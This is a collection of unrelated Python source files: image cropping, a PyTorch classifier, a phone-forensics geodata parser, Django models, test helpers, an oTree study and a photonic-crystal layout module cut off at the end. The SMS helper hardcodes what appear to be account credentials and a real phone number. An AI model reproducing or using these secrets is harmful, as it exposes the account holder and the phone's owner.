op_name = "fillcrop"
imagedir = app.get_image_media_dir()
# If the image already fits in the box, just return it, don't upscale
if instance.width < width and instance.height < height:
return instance.file.name
storage = instance.file.storage
newname = instance.file.name.replace(imagedir, f"img-{op_name}-{width}x{height}")
newname = storage.generate_filename(newname)
with instance.open_file() as img_file:
image = pillow.Image.open(img_file).copy() # open original image
target_aspect = width / height
if instance.aspect_ratio > target_aspect:
# src is wider, so fit the height and crop the width
temp_width = int(height * instance.aspect_ratio)
image.thumbnail([temp_width, height]) # transform in memory
x = int((temp_width - width) / 2) # crop from center
image = image.crop([x, 0, x + width, height])
else:
# dest is wider, fit the width and crop the height
temp_height = int(width / instance.aspect_ratio)
image.thumbnail([width, temp_height]) # transform in memory
y = int((temp_height - height) / 2) # crop from center
image = image.crop([0, y, width, y + height])
# Store to local file. Suffix needed for img format detection
tmpfile = tempfile.NamedTemporaryFile(
"wb", delete=False, suffix=Path(newname).suffix
)
image.save(tmpfile, format=image.format)
# To reopen, some platforms require close
# https://docs.python.org/3.8/library/tempfile.html#tempfile.NamedTemporaryFile
tmpfile.close()
# Hand the tmpfile to the image storage. Must have valid img suffix e.g. .jpg
saved_as = storage.save(newname, ImageFile(open(tmpfile.name, "rb")))
return saved_as
@dataclass
class Thumb:
"A helper class representing a transformed image."
op: str
kwargs: dict
path: str = ""
@property
def url(self) -> str:
return settings.MEDIA_URL + self.path
|
import numpy as np
import matplotlib as plt
import torch
import torchvision
from torchvision import datasets, models, transforms
from torch.utils.data import DataLoader
import torch.nn.functional as Function
from torch import nn, optim
from torch.autograd import Variable
from PIL import Image
import json
from workspace_utils import active_session
from workspace_utils import keep_awake
import argparse
argument_parse = argparse.ArgumentParser()
argument_parse.add_argument('--gpu', action = 'store_true', default = 'gpu', help = 'needed for training the network')
argument_parse.add_argument('--epochs', action='store', type=int, default = 5, help='sets epochs to train the model over and over again')
argument_parse.add_argument('--arch', '--a', default='vgg13', help='architecture of choice')
argument_parse.add_argument('--learning_rate', action='store', type= float, default = 0.01, help=' learning rate of the model is set')
argument_parse.add_argument('--hidden_layer', action='store', type= int, default = 2048, help=' learning rate of the model is set')
argument_parse.add_argument('--data_dir', '--d', type=str ,default = 'flowers', help='path to the folder that contains flower images')
argument_parse.add_argument('--save_dir', '--s', help='to set the directory to save checkpoints')
args= argument_parse.parse_args()
data_dir = args.data_dir
train_dir = data_dir + '/train'
valid_dir = data_dir + '/valid'
test_dir = data_dir + '/test'
lr = args.learning_rate
arch = args.arch
hidden_layer = args.hidden_layer
model = arch
data_transforms_one = transforms.Compose([
transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406],
[0.229, 0.224, 0.225])])
data_transforms_two = transforms.Compose([
transforms.RandomHorizontalFlip(),
transforms.RandomVerticalFlip(),
transforms.Resize(255),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406],[0.229, 0.224, 0.225])])
data_transforms_three = transforms.Compose([
transforms.RandomHorizontalFlip(),
transforms.RandomVerticalFlip(),
transforms.Resize(255),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406],[0.229, 0.224, 0.225])])
train_dataset = datasets.ImageFolder(train_dir, transform=data_transforms_one)
valid_dataset = datasets.ImageFolder(valid_dir, transform=data_transforms_one)
test_dataset = datasets.ImageFolder(test_dir, transform=data_transforms_one)
train_loaders = torch.utils.data.DataLoader(train_dataset, shuffle = True, batch_size = 64)
valid_loaders = torch.utils.data.DataLoader(valid_dataset, batch_size = 64)
test_loaders = torch.utils.data.DataLoader(test_dataset, batch_size = 30)
import json
with open('cat_to_name.json', 'r') as f:
cat_to_name = json.load(f)
from torch import nn, optim
class Feedforward(torch.nn.Module):
def __init__(self, input_size, hidden_size, drop_p=0.2):
super(Feedforward, self).__init__()
self.input_size = input_size
self.hidden_size = hidden_size
self.fc1 = torch.nn.Linear(self.input_size, self.hidden_size)
self.relu = torch.nn.ReLU()
self.fc2 = torch.nn.Linear(self.hidden_size,102)
self.dropout = nn.Dropout(p=drop_p)
self.activation = torch.nn.LogSoftmax(dim=1)
def forward(self,x):
hidden = self.fc1(x)
relu = self.relu(hidden)
output_one = self.fc2(relu)
output_final = self.activation(output_one)
return output_final
if args.arch == 'vgg13':
model = models.vgg13(pretrained=True)
elif args.arch == 'vgg16':
model = models.vgg16(pretrained = True)
device = torch.device("cuda:0" if torch.cuda.is_available() and args.gpu else "cpu")
for param in model.parameters():
param.requires_grad = False
model.classifier = Feedforward(25088, hidden_layer)
model = model.to(device)
criterion = nn.NLLLoss()
optimizer = optim.SGD(model.classifier.parameters(),lr)
print(model)
steps_taken = 0
running_loss = 0.0
print_step = 10
epochs = args.epochs
with active_session():
for epoch in range(epochs):
for inputs, labels in train_loaders:
steps_taken += 1
inputs = inputs.to(device)
labels = labels.to(device)
optimizer.zero_grad()
log = model.forward(inputs)
loss = criterion(log, labels)
loss.backward()
optimizer.step()
running_loss += loss.item()
if steps_taken % print_step == 0:
loss_v = 0
accuracy = 0
model.eval()
with torch.no_grad():
for inputs, labels in valid_loaders:
inputs, labels = inputs.to(device), labels.to(device)
log = model.forward(inputs)
batch_loss = criterion(log, labels)
loss_v += batch_loss.item()
#https://towardsdatascience.com/how-to-train-an-image-classifier-in-pytorch-and-
#use-it-to-perform-basic-inference-on-single-images-99465a1e9bf5
#check accuracy
ps = torch.exp(log)
top_p, top_class = ps.topk(1, dim=1)
equals = top_class == labels.view(*top_class.shape)
accuracy += torch.mean(equals.type(torch.FloatTensor)).item()
training_loss = running_loss/print_step
valid_loss = loss_v/len(valid_loaders)
valid_acc = accuracy/len(valid_loaders)
print("current epoch: {}/{}". format(epoch+1, 5))
print("Training loss: {}".format(training_loss))
print("Validation loss: {}".format(valid_loss))
print("Validation accuracy: {}".format(valid_acc))
print('Training process has finished.')
running_loss = 0
model.train()
def check_accuracy(test_loaders):
model.to(device)
with torch.no_grad():
accuracy = 0
model.eval()
for inputs, labels in test_loaders:
inputs, labels = inputs.to(device),labels.to(device)
output = model.forward(inputs)
batch_loss = criterion(output, labels)
#https://towardsdatascience.com/how-to-train-an-image-classifier-in-pytorch-and-
#use-it-to-perform-basic-inference-on-single-images-99465a1e9bf5
#check accuracy
ps = torch.exp(output)
top, top_class = ps.topk(1, dim=1)
equals = top_class == labels.view(*top_class.shape)
accuracy += torch.mean(equals.type(torch.FloatTensor)).item()
fin_test_acc = (100 * accuracy/len(test_loaders))
print("test accuracy: {}".format(fin_test_acc))
check_accuracy(test_loaders)
#save at checkpoint
model.class_to_idx = train_dataset.class_to_idx
torch.save({'state_dict': model.state_dict(), 'optimizer': optimizer.state_dict(), 'arch': arch , 'classifier': model.classifier, 'hidden_size': hidden_layer, 'epochs':epochs, 'lr' : lr, 'class_to_idx': model.class_to_idx}, 'checkpoint.pth')
model.to(device) |
import glob
import json
import os
import shutil
import sqlite3
from scripts.artifact_report import ArtifactHtmlReport
from scripts.ilapfuncs import logfunc, is_platform_windows
def get_cmh(files_found, report_folder, seeker):
file_found = str(files_found[0])
db = sqlite3.connect(file_found)
cursor = db.cursor()
cursor.execute('''
SELECT
datetime(datetaken /1000, "unixepoch") as times,
latitude,
longitude,
address_text,
uri,
_data
FROM location_view
''')
all_rows = cursor.fetchall()
usageentries = len(all_rows)
if usageentries > 0:
report = ArtifactHtmlReport('Samsung CMH')
report.start_artifact_report(report_folder, f'Geodata')
report.add_script()
data_headers = ('Data Taken', 'Latitude', 'Longitude','Address', 'URI', 'Data Location')
data_list = []
for row in all_rows:
data_list.append((row[0], row[1], row[2], row[3], row[4], row[5]))
report.write_artifact_data_table(data_headers, data_list, file_found)
report.end_artifact_report()
else:
logfunc(f'No Samsung_CMH_GeoData available')
db.close()
return |
import argparse
import json
import os
import django
import logging
FSW_ACCOUNT = 18
CANVAS_URL = "https://canvas.vu.nl"
os.environ['DJANGO_SETTINGS_MODULE'] = 'dejavu.settings'
django.setup()
logging.basicConfig(level=logging.INFO, format='[%(asctime)s %(name)-12s %(levelname)-5s] %(message)s')
import canvasapi
from dejaviewer.models import Course, CourseField
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('apikey')
args = parser.parse_args()
canvas = canvasapi.Canvas(CANVAS_URL, args.apikey)
c = Course.objects.get(code="S_D1")
course = canvas.get_course(c.canvas_course, include=["syllabus_body"])
f = CourseField.objects.get(field='description')
c.set_field("description", "canvas syllabus", course.syllabus_body)
c.save()
|
# Generated by Django 3.1.3 on 2021-10-17 06:14
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Profile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('profile_picture', models.ImageField(upload_to='images/')),
('bio', models.TextField(blank=True, default='Bio', max_length=500)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Image',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('image_name', models.CharField(blank=True, max_length=80)),
('image_caption', models.CharField(max_length=600)),
('comments', models.CharField(blank=True, max_length=30)),
('image', models.ImageField(upload_to='images/')),
('image_profile', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='insta.profile')),
('likes', models.ManyToManyField(blank=True, related_name='likes', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('comment', models.TextField()),
('date', models.DateTimeField(auto_now_add=True, null=True)),
('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='insta.image')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='insta.profile')),
],
),
]
|
# -*- coding:utf-8 -*-
from ihome.libs.yuntongxun.CCPRestSDK import REST
# 说明:主账号,登陆云通讯网站后,可在"控制台-应用"中看到开发者主账号ACCOUNT SID
_accountSid = '8aaf070858862df301588a202b520154'
# 说明:主账号Token,登陆云通讯网站后,可在控制台-应用中看到开发者主账号AUTH TOKEN
_accountToken = 'd42ff3839c2f4defa0361e5e11234b11'
# 请使用管理控制台首页的APPID或自己创建应用的APPID
_appId = '8aaf070858862df301588a202ba50159'
# 说明:请求地址,生产环境配置成app.cloopen.com
_serverIP = 'sandboxapp.cloopen.com'
# 说明:请求端口 ,生产环境为8883
_serverPort = '8883'
# 说明:REST API版本号保持不变
_softVersion = '2013-12-26'
# 云通讯官方提供的发送短信代码实例
# # 发送模板短信
# # @param to 手机号码
# # @param datas 内容数据 格式为数组 例如:{'12','34'},如不需替换请填 ''
# # @param $tempId 模板Id
#
# def sendTemplateSMS(to, datas, tempId):
# # 初始化REST SDK
# rest = REST(serverIP, serverPort, softVersion)
# rest.setAccount(accountSid, accountToken)
# rest.setAppId(appId)
#
# result = rest.sendTemplateSMS(to, datas, tempId)
# for k, v in result.iteritems():
#
# if k == 'templateSMS':
# for k, s in v.iteritems():
# print '%s:%s' % (k, s)
# else:
# print '%s:%s' % (k, v)
class CCP(object):
"""发送短信的辅助类"""
def __new__(cls, *args, **kwargs):
# 判断是否存在类属性_instance,_instance是类CCP的唯一对象,即单例
if not hasattr(CCP, "_instance"):
cls._instance = super(CCP, cls).__new__(cls, *args, **kwargs)
cls._instance.rest = REST(_serverIP, _serverPort, _softVersion)
cls._instance.rest.setAccount(_accountSid, _accountToken)
cls._instance.rest.setAppId(_appId)
return cls._instance
def send_template_sms(self, to, datas, temp_id):
"""发送模板短信"""
# @param to 手机号码
# @param datas 内容数据 格式为数组 例如:{'12','34'},如不需替换请填 ''
# @param temp_id 模板Id
result = self.rest.sendTemplateSMS(to, datas, temp_id)
# 如果云通讯发送短信成功,返回的字典数据result中statuCode字段的值为"000000"
if result.get("statusCode") == "000000":
# 返回0 表示发送短信成功
return 0
else:
# 返回-1 表示发送失败
return -1
if __name__ == '__main__':
ccp = CCP()
# 注意: 测试的短信模板编号为1
ccp.send_template_sms('18949599846', ['1234', 5], 1) |
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""
@File : 78.py
@Contact : huanghoward@foxmail.com
@Modify Time : 2022/5/28 18:54
------------
"""
from typing import List
class Solution:
def subsets(self, nums: List[int]) -> List[List[int]]:
res = []
def back(index, path):
if index == len(nums):
res.append(path)
return
back(index + 1, path + [nums[index]])
back(index + 1, path)
back(0,[])
print(res)
if __name__ == '__main__':
s = Solution()
s.subsets([1, 2, 3])
|
import turtle
import pyperclip as pc
class TreeNode:
def __init__(self, val, left=None, right=None):
self.val = val
self.left = left
self.right = right
def __repr__(self):
return "TreeNode({})".format(self.val)
class TreeBuild:
""" Display how our tree looks like. """
def __init__(self):
repeat = "y"
while repeat == "y" or repeat == "Y":
ar = input("Enter the tree info in form '[...]': \n").strip()
print(ar)
self.drawtree(self.deserialize(ar))
repeat = input("Display another tree, if true 'y' else 'n' : ").strip()
@staticmethod
def deserialize(string):
if string == "{}":
return None
nodes = [
None if val == "null" else TreeNode(int(val))
for val in string.strip("[]{}").split(",")
]
kids = nodes[::-1]
root = kids.pop()
for node in nodes:
if node:
if kids:
node.left = kids.pop()
if kids:
node.right = kids.pop()
return root
@staticmethod
def drawtree(root):
def height(root):
return 1 + max(height(root.left), height(root.right)) if root else -1
def jumpto(x, y):
t.penup()
t.goto(x, y)
t.pendown()
def draw(node, x, y, dx):
if node:
t.goto(x, y)
jumpto(x, y - 20)
t.write(node.val, align="center", font=("Arial", 12, "normal"))
draw(node.left, x - dx, y - 60, dx / 2)
jumpto(x, y - 20)
draw(node.right, x + dx, y - 60, dx / 2)
t = turtle.Turtle()
t.speed(0)
turtle.delay(0)
h = height(root)
jumpto(0, 30 * h)
draw(root, 0, 30 * h, 40 * h)
t.hideturtle()
turtle.mainloop()
class SquareBracketToCurlyBracket:
""" [[ ]] -> {{}} or [] -> {} or [[...[]...]] -> {{..{}..}} """
def __init__(self):
flag = True
while flag:
s = input(
"Enter input in valid form (e.g., [a, b, c, ...]): \n"
).strip()
pc.copy(s.replace("[", "{").replace("]", "}"))
pc.paste()
class ToCharArray:
def stringToCharArray(self, s):
if s.startswith('"'):
s = s[1:]
if s.endswith('"'):
s = s[:-1]
str = "{"
for i in s:
str += "'" + i + "'" + ", "
str = str[:-2] + "}"
print(str)
return str
def __init__(self):
a = "y"
while a == "y":
s = input("print string to char array: \n").strip()
pc.copy(self.stringToCharArray(s))
pc.paste()
a = input("Coninue, if true 'y' else 'n': ")
if __name__ == "__main__":
rep = "y"
while rep == "y" or rep == "Y":
print("*" * 10 + " ~~HELPER MENU~~ " + "*" * 10 + "\n")
print("1. Draw Tree (press 1) ")
print("2. Convert [] to {} (press 2) ")
print("3. String to CharArray e.g., \"add\" -> \"{'a','d','d'}\" (press 3)")
inp = int(input("\nPress enter your choice : "))
print()
if inp == 1:
t = TreeBuild()
elif inp == 2:
t = SquareBracketToCurlyBracket()
elif inp == 3:
t = ToCharArray()
else:
exit()
rep = input(
"\nDo you want to see 'HELPER MENU', if true 'y' else 'n' : "
).strip()
|
##############################################################################
#
# Copyright (c) 2001, 2002 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Provide a mixin base class for storage tests.
The StorageTestBase class provides basic setUp() and tearDown()
semantics (which you can override), and it also provides a helper
method _dostore() which performs a complete store transaction for a
single object revision.
"""
from __future__ import print_function
import sys
import time
from ZODB.Connection import TransactionMetaData
from ZODB.utils import u64, z64
from ZODB.tests.MinPO import MinPO
from ZODB._compat import PersistentPickler, Unpickler, BytesIO, _protocol
import ZODB.tests.util
ZERO = z64
def snooze():
# In Windows, it's possible that two successive time.time() calls return
# the same value. Tim guarantees that time never runs backwards. You
# usually want to call this before you pack a storage, or must make other
# guarantees about increasing timestamps.
now = time.time()
while now == time.time():
time.sleep(0.1)
def _persistent_id(obj):
oid = getattr(obj, "_p_oid", None)
if getattr(oid, "__get__", None) is not None:
return None
else:
return oid
def zodb_pickle(obj):
"""Create a pickle in the format expected by ZODB."""
f = BytesIO()
p = PersistentPickler(_persistent_id, f, _protocol)
klass = obj.__class__
assert not hasattr(obj, '__getinitargs__'), "not ready for constructors"
args = None
mod = getattr(klass, '__module__', None)
if mod is not None:
klass = mod, klass.__name__
state = obj.__getstate__()
p.dump((klass, args))
p.dump(state)
return f.getvalue()
def persistent_load(pid):
# helper for zodb_unpickle
return "ref to %s.%s oid=%s" % (pid[1][0], pid[1][1], u64(pid[0]))
def zodb_unpickle(data):
"""Unpickle an object stored using the format expected by ZODB."""
f = BytesIO(data)
u = Unpickler(f)
u.persistent_load = persistent_load
klass_info = u.load()
if isinstance(klass_info, tuple):
if isinstance(klass_info[0], type):
# Unclear: what is the second part of klass_info?
klass, xxx = klass_info
assert not xxx
else:
if isinstance(klass_info[0], tuple):
modname, klassname = klass_info[0]
else:
modname, klassname = klass_info
if modname == "__main__":
ns = globals()
else:
mod = import_helper(modname)
ns = mod.__dict__
try:
klass = ns[klassname]
except KeyError:
print("can't find %s in %r" % (klassname, ns), file=sys.stderr)
inst = klass()
else:
raise ValueError("expected class info: %s" % repr(klass_info))
state = u.load()
inst.__setstate__(state)
return inst
def import_helper(name):
__import__(name)
return sys.modules[name]
class StorageTestBase(ZODB.tests.util.TestCase):
# It would be simpler if concrete tests didn't need to extend
# setUp() and tearDown().
_storage = None
def _close(self):
# You should override this if closing your storage requires additional
# shutdown operations.
if self._storage is not None:
self._storage.close()
def tearDown(self):
self._close()
ZODB.tests.util.TestCase.tearDown(self)
def _dostore(self, oid=None, revid=None, data=None,
already_pickled=0, user=None, description=None, extension=None):
"""Do a complete storage transaction. The defaults are:
- oid=None, ask the storage for a new oid
- revid=None, use a revid of ZERO
- data=None, pickle up some arbitrary data (the integer 7)
Returns the object's new revision id.
"""
if oid is None:
oid = self._storage.new_oid()
if revid is None:
revid = ZERO
if data is None:
data = MinPO(7)
if type(data) == int:
data = MinPO(data)
if not already_pickled:
data = zodb_pickle(data)
# Begin the transaction
t = TransactionMetaData(extension=extension)
if user is not None:
t.user = user
if description is not None:
t.description = description
try:
self._storage.tpc_begin(t)
# Store an object
r1 = self._storage.store(oid, revid, data, '', t)
# Finish the transaction
r2 = self._storage.tpc_vote(t)
revid = self._storage.tpc_finish(t)
except:
self._storage.tpc_abort(t)
raise
return revid
def _dostoreNP(self, oid=None, revid=None, data=None,
user=None, description=None):
return self._dostore(oid, revid, data, 1, user, description)
# The following methods depend on optional storage features.
def _undo(self, tid, expected_oids=None, note=None):
# Undo a tid that affects a single object (oid).
# This is very specialized.
t = TransactionMetaData()
t.note(note or u"undo")
self._storage.tpc_begin(t)
undo_result = self._storage.undo(tid, t)
vote_result = self._storage.tpc_vote(t)
if expected_oids is not None:
oids = set(undo_result[1]) if undo_result else set()
if vote_result:
oids.update(vote_result)
self.assertEqual(oids, set(expected_oids))
return self._storage.tpc_finish(t)
|
from otree.api import (
models, widgets, BaseConstants, BaseSubsession, BaseGroup, BasePlayer,
Currency as c, currency_range,
)
import random
author = 'Victor_Farah'
doc = """
The Surrogation Game
"""
class Constants(BaseConstants):
name_in_url = 'surrogation'
players_per_group = None
num_rounds = 1
class Subsession(BaseSubsession):
def creating_session(self):
# randomize to treatments
# Now always set to surrotation treatment
for player in self.get_players():
#player.surrogation = random.choice(['yes', 'no'])
player.surrogation = 'yes'
print('set player.surrogation to', player.surrogation)
# Ranomly set measure if surrogation treatment
if player.surrogation == 'yes':
player.measure_skill = random.choice(['Intelligence', 'Strength', 'Charisma', 'Agility', 'Stamina'])
print('set player.measure_skill to', player.measure_skill)
# randomize avatar condition
# Now always set to avatar treatment
for player in self.get_players():
#player.avatar = random.choice(['yes', 'no'])
player.avatar = 'yes'
print('set player.avatar to', player.avatar)
class Group(BaseGroup):
pass
class Player(BasePlayer):
accept_instructions = models.BooleanField(blank=False, widget=widgets.CheckboxInput)
accept_character = models.BooleanField(blank=False, widget=widgets.CheckboxInput)
surrogation = models.StringField()
measure_skill = models.StringField()
avatar = models.StringField()
#Traits
#intelligence = models.FloatField(
#widget=widgets.SliderInput(attrs={'step': '1', 'style': 'width:500px'}, show_value=True),
#min=0,
#initial=None,
#max=100,
#)
intelligence = models.IntegerField(blank=True)
strength = models.IntegerField(blank=True)
charisma = models.IntegerField(blank=True)
agility= models.IntegerField(blank=True)
stamina = models.IntegerField(blank=True)
gender = models.IntegerField(
blank=False,
choices=[
[1, 'Male'],
[2, 'Female']
]
) |
from .context import assert_equal, get_simple_examples
import pytest
from sympy import Abs
examples = get_simple_examples(Abs)
delimiter_pairs = {
'|': '|',
'\\vert': '\\vert',
'\\lvert': '\\rvert'
}
@pytest.mark.parametrize('input, output, symbolically', examples)
def test_abs(input, output, symbolically):
for left, right in delimiter_pairs.items():
assert_equal("{left}{input}{right}".format(left=left, right=right, input=input), output, symbolically=symbolically)
assert_equal("\\left{left}{input}\\right{right}".format(left=left, right=right, input=input), output, symbolically=symbolically)
assert_equal("\\mleft{left}{input}\\mright{right}".format(left=left, right=right, input=input), output, symbolically=symbolically)
|
import gdspy
import math
def waveguide(w,l,layer):
""" waveguide rectangle """
wg=gdspy.Rectangle((-l/2,-w/2),(l/2,w/2),**layer)
return wg
def photonic_crystal(normal_holes,taper_holes,radius,taper_depth,spacing,
cell_name,input_taper_holes,input_taper_percent,layer):
""" define a parabolically tapered photonic crystal cavity. hole size
and length are tapered simulataneously. a certain number of input taper
holes can be defined to reduce input scattering loss.
also returns the length of the photonic crystal
"""
min_spacing=taper_depth*spacing
dist=min_spacing/2
holes=[]
# add taper holes
for i in range(taper_holes):
if i>0:
dist+=spacing*taper_depth+i**2*(1-taper_depth)*spacing/(taper_holes**2)
rad=taper_depth*radius+((i**2)*(1-taper_depth)*radius/(taper_holes**2))
hole_pos=gdspy.Round((dist,0),rad,number_of_points=199,**layer)
hole_neg=gdspy.Round((-dist,0),rad,number_of_points=199,**layer)
# add all holes to a list
holes.append(hole_pos)
holes.append(hole_neg)
# add untapered holes
for i in range(normal_holes):
dist+=spacing
hole_pos=gdspy.Round((dist,0),radius,number_of_points=199,**layer)
hole_neg=gdspy.Round((-dist,0),radius,number_of_points=199,**layer)
holes.append(hole_pos)
holes.append(hole_neg)
# add input taper
for i in range(input_taper_holes):
dist+=spacing
rad=radius-radius*(1-input_taper_percent)/input_taper_holes*(i+1)
hole_neg=gdspy.Round((-dist,0),rad,number_of_points=199,**layer)
holes.append(hole_neg)
l_tot=dist*2
return holes,l_tot
def wg_support(wg_width,w,l,layer):
""" add a support at the top of the waveguide where it attaches to the
substrate.
"""
support_pts=[(0,-wg_width/2),(0,wg_width/2),(l,wg_width/2+w/2),(l,-wg_width/2-w/2)]
support=gdspy.Polygon(support_pts,**layer)
return support
def input_taper(min_width,wg_width,l,layer):
""" taper the waveguide to a given width. """
# the origin of the input taper is defined where it contacts the waveguide
input_pts=[(-l,-min_width/2),(-l,min_width/2),(0,wg_width/2),(0,-wg_width/2)]
input_shp=gdspy.Polygon(input_pts,**layer)
return input_shp
def support_tether(width,length,max_width,taper_length,wg_width,layer):
"""add support tethers along the waveguide. """
# add the lines for each tether without the triangular support
tether_l=gdspy.Rectangle((-width/2,-wg_width/2),(width/2,-length-wg_width/2),**layer)
tether_r=gdspy.Rectangle((-width/2,wg_width/2),(width/2,length+wg_width/2),**layer)
# add the support taper for each tether
support_pts_l=[(-width/2,-wg_width/2-length),(width/2,-wg_width/2-length),(max_width/2,-wg_width-length-taper_length),
(-max_width/2,-wg_width-length-taper_length)]
support_pts_r=[(-width/2,wg_width/2+length),(width/2,wg_width/2+length),(max_width/2,wg_width+length+taper_length),
(-max_width/2,wg_width+length+taper_length)]
# add the points to a polygon
support_l=gdspy.Polygon(support_pts_l,**layer)
support_r=gdspy.Polygon(support_pts_r,**layer)
return [tether_l,tether_r,support_l,support_r]
def bounding_rectangle(pattern_w,pattern_l,padding,layer,rect_shift,clearance,opt_litho_layer):
""" creates a rectangle of a predefined width bounding the pattern.
Rect shift is a tuple of coordinates specifying the offset of the
rectangle
"""
print('pattern_w :'+str(pattern_w))
print('pattern_l: '+str(pattern_l))
print('padding: '+str(padding))
print('layer: '+str(layer))
print('rect shift: '+str(rect_shift))
xshift,yshift=rect_shift
interior_rectangle=gdspy.Rectangle((-pattern_l/2+xshift,-pattern_w/2+yshift),
(pattern_l/2+xshift,pattern_w/2+yshift),**layer)
exterior_rectangle=gdspy.Rectangle((-pattern_l/2-padding+xshift,-pattern_w/2-padding+yshift),
(pattern_l/2+padding+xshift,pattern_w/2+padding+yshift),layer)
# define the rectangle used for optical lithography
opt_rectangle=gdspy.Rectangle((-pattern_l/2-padding+xshift+clearance,-pattern_w/2-padding+yshift+clearance),
(pattern_l/2+padding+xshift-clearance,pattern_w/2+padding+yshift-clearance),**opt_litho_layer)
# subtract the interior rectangle from the exterior rectangle
sub=gdspy.boolean(exterior_rectangle,interior_rectangle,'not')
return sub,pattern_l,opt_rectangle
def phc_wg(normal_holes,taper_holes,radius,taper_depth,spacing,
cell_name,input_taper_holes,input_taper_percent,layer_phc,
wg_width,extra_space,layer_wg,support_width,support_length,
taper_width,taper_length,tether_width,tether_length,tip_space,
clearance,opt_litho_layer,padding):
""" generates a photonic crystal on top of a waveguide which
is long enough to match the length of the photonic crystal cavity.
Returns a cell containing the photonic crystal geometry with support
structures.
extra space is the extra space beyond the photonic crystal that
the waveguide extends on each side.
"""
phc_geom,wg_l=photonic_crystal(normal_holes,taper_holes,radius,
taper_depth,spacing,cell_name,input_taper_holes,input_taper_percent,layer_phc)
wg_geom=waveguide(wg_width,wg_l+extra_space*2,layer_wg)
# subtract the photonic crystal from the waveguide
phc_wg=gdspy.boolean(wg_geom,phc_geom,'not')
# add a reference to the end support but shift it to the end of the waveguide
# add this object to the same layer as the waveguide
supp_geom=wg_support(wg_width,support_width,support_length,layer_wg)
# create a reference for the support structure and shift it to the end of the waveguide
# create the cell holding the support structure
supp_cell=gdspy.Cell('support structure '+cell_name)
supp_cell.add(supp_geom)
supp_ref=gdspy.CellReference(supp_cell,(wg_l/2+extra_space,0))
# add a reference to the waveguide taper
taper_geom=input_taper(taper_width,wg_width,taper_length,layer_wg)
taper_cell=gdspy.Cell('input taper cell '+cell_name)
taper_cell.add(taper_geom)
taper_ref=gdspy.CellReference(taper_cell,(-wg_l/2-extra_space,0))
# add a reference to the support tethers
tether_geom=support_tether(tether_width,tether_length,support_width,support_length,
wg_width,layer_wg)
tether_cell=gdspy.Cell('tether '+cell_name)
tether_cell.add(tether_geom)
# place the tether between the waveguide taper and photonic crystal
tether_ref=gdspy.CellReference(tether_cell,(-wg_l/2-extra_space/2,0))
# add the bounding box
# calculate the total pattern length
# add extra space to account for distance past tip
total_len=wg_l+extra_space*2+support_length+taper_length+tip_space
# locate pattern center
#center=-(taper_length/2+support_length+2*extra_space
center=-taper_length/2+support_length/2-tip_space/2
# calculate the total width of pattern
total_w=wg_width+tether_length*2+support_length*2
rect_shift=(center,0)
# create a bounding rectangle
bounding_rect,pattern_l,opt_rectangle=bounding_rectangle(total_w,total_len,padding,layer_wg,rect_shift,clearance,opt_litho_layer)
# add the geometries to a cell
device_cell=gdspy.Cell('device '+cell_name)
device_cell.add([phc_wg])
# add the support tethers to a cell
device_cell.add([tether_ref,supp_ref,tether_ref,taper_ref])
return device_cell,bounding_rect,total_len,total_w,rect_shift,opt_rectangle
def txt_label(list):
""" This function takes a list of items to be added to a text label and
creates a vertical label where the text is separated by dashes (-).
"""
label=''
for i in list:
if i==list[0]:
label+=str(i)
else:
label+='-'+str(i)
return label
def text_rect(bounding_box,box_length,box_width,txt_label,txt_height,layer,rect_shift,extra_text=None):
"""creates a bounding rectangle with text subtracted from it.
returns a cell.
"""
# get the bounding box
# add a 1um offset from the rest of the pattern
offset=box_length/2+1
xshift,yshift=rect_shift
print(xshift)
test1=offset+xshift
# add the text
vtext=gdspy.Text(txt_label,txt_height,(offset+xshift,box_width/2+yshift),horizontal=False,**layer)
# first subtract the interior rectangle from the exterior rectangle
sub=gdspy.boolean(bounding_box,vtext,'not')
return sub
def cavity_text(text_box,cavity_cell,cell_name,opt_rectangle):
"""
outputs a cell with a cavity labeled by it's number of mirror hole
pairs and taper hole pairs. Returns a cell containing the text and cavity
"""
# the location of the bounding box will be shifted by the support length and the taper length
# locate pattern center
txtcell=gdspy.Cell('text '+cell_name)
txtcell.add([text_box,opt_rectangle])
txtref=gdspy.CellReference(txtcell,(0,0),rotation=90)
# create a cell reference for the cavity cell
cavity_ref=gdspy.CellReference(cavity_cell,(0,0),rotation=90)
# add the bounding rectangle to the cavity cell
total=gdspy.Cell('total cell '+cell_name)
total.add([cavity_ref,txtref])
return total
def alignment_mark(xw,xl,layer):
""" creates a cross alignment mark geometry, by taking the union of 2
rectangles.
"""
horizontal=gdspy.Rectangle((-xl/2,-xw/2),(xl/2,xw/2),**layer)
vertical=gdspy.Rectangle((-xw/2,-xl/2),(xw/2,xl/2),**layer)
cross=gdspy.boolean(horizontal,vertical,'or',**layer)
return cross
def disc_resonator(radius,center,layer):
